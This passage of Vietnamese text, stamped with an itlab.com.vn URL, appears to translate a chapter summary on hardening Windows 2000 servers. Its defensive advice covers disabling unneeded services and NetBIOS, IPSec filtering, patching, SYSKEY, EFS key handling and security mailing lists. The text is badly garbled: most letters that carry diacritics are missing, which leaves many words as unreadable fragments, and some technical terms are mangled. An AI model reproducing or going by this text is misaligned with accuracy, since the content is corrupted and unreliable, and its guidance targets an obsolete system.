thng s b tn cng. Cp ng dng ny lun xa s nguy him hn - c bit s hin i, khng c quc tch, cc ng dng trn nn trang web. Thc hin s chuyn cn ca bn ti cp OS s dng thng tin cung cp trong chng ny, nhng tiu im cao v ch yu bo v ton b lp ng dng. N c th nghe rt u tr, nhng m bo bn ang trin khai mt phin bn cp cao ca Window 2000. My ch v nhng sn phm My ch tin tin a ra mt s lng ln nhng dch v (c bit khi c cu hnh nh l b iu khin min th

http://itlab.com.vn

http://itlab.com.vn

mc ch ng ) v nn c bo v cht ch trnh khi nhng mng khng tin cy, nhng ngi s dng v bt k ci g bn vn cn m h. Sqr dng ti thiu bng s an ton cao: nu khng c ci g tn ti xm nhp, nhng k xm nhp s khng c cch no t nhp c. S dng dch v .msc gy mt kh nng hot ng nhng dch v khng cn thit. Nhng dch v cn thit cn li, nh hnh chng mt cch an ton; v d, cu hnh dch v DSN ca Windows 2000 hn ch vng chuyn dch ti cc my ch chuyn bit. Nu ti liu v cc dch v in khng cn thit, v hiu kh nng hot ng ca NetBIOS qua TCP/IP bng cch m Mng v Quay s kt ni v chn Advanced\ Advanced Settings v hu la chn File v Printer Sharing For Microsoft Networks cho mi thit b iu hp m bn mun bo v, minh ho trong hnh 6-1 u chng ny. Nhng ci cn li l nhng cch tt nht cu hnh nn giao din bn ngoi my ch kt ni mng Internet. S dng mng lc TCP/IP v nhng mng lc IPSec mi ( miu t trong chng ny) kho truy cp ti bt k mt cng nghe no khc ngoi tr chc nng hon ton cn thit ti thiu. Bo v cc giao din Internet ca my ch v tng la hay nhng li i c trang b hn ch nhng cuc xm nhp dch v t chi nh l dng l SYN v nhng cn bo ph v IP. Thm vo , nhng bc a ra trong chng ny lm vng mnh Windows 2000 chng li tiu chun IP da trn nhng cuc xm nhp DoS, v t c s trn ln thch hp ni tm IP khng lin quan n nhng li my tnh. Gi cp nhp vi ton b nhng gi dch v gn y v nhng s ni an ton. Xem http:// www.microsoft.com/security xem bang tin danh sch cp nhp. Hn ch nhng c quyn ng nhp tng tc dng nhng cuc xm nhp mnh c quyn ( ging nh dch v tn l d on trc ng ng v cc vn trm windows) trc khi chng bt u. Bt k khi no c th, thot khi kh vc My ch u cui hn l ch ngt kt ni t chng, khng di nhng khu vc m cho nhng nh qun l u xm nhp vo. S dng nhng cng c mi nh Chnh sch Nhm ( gpedit.msc) v Cu hnh an ton v s Phn tch cng c theo khun mu truyn thng tr gip to v xy dng nhng cu hnh an ton thng sut mi trng Windows 2000 cu bn. Tun theo mt chnh sch mnh v s an ton vt l bo v chng li nhng cuc xm nhp ngoi tuyn chng li SAM v EFS c minh ho trong chng ny. S thc thi SYSKEY trong ch mt khu hay a mm c bo v to ra nhng cuc xm nhp ny kh hn. Gi nhng my ch nhy an ton v mt vt l, t mt khu BIOS bo v s np tun t, v xo hay v hiu ho a mm v xo cc thit b truyn thng m c th np h thng thay i OSes. Theo Best Practices for Using EFS tm thy trong Windows 2000 tr gip cc tp tin, thc thi s m ho mc th mc rng cho nhiu ngi s dng d liu khi c th, c bit cho nhng ngi s dng my tnh xch tay. m bo xut khu v sau xo s sao chp cc b s phc hi kho chi nhnh cc biu tng EFS m ho khng d b nguy him i vi cc cuc xm nhp ngoi tuyn m lm tn hi Nh qun l phc hi chng nhn. Thu bao ti danh sch gi NTBugtraq ( http:// www.ntbugtraq.com) gi vng nhng tho lun hin hnh trong s an ton ca NT 2000. Nu khi lng lu chuyn trn danh sch tr nn vng vng cho mt vi rnh, thay i s m t cu bn ti cc dng in bo, m trong mt in bo ca tt c nhng tin nhn quan

trng c a ra nh k cn c mong i. nhn danh sch th dng in bo trong mng NT an ton, gi mt tin nhn ti listserv@listserv.ntbugtraq.com cng vi t in bo NT an ton trong on gia cu tin nhn. ( bn khng cn mt tuyn i tng) . Danh sch th in t ca Win2KsecAdvice taih http:// www.ntsecurity.net m ging ht NTBugtraq, thnh thong c ni dung danh sch NTBugtraq st. N cng c mt phin bn in bo thun tin.

http://itlab.com.vn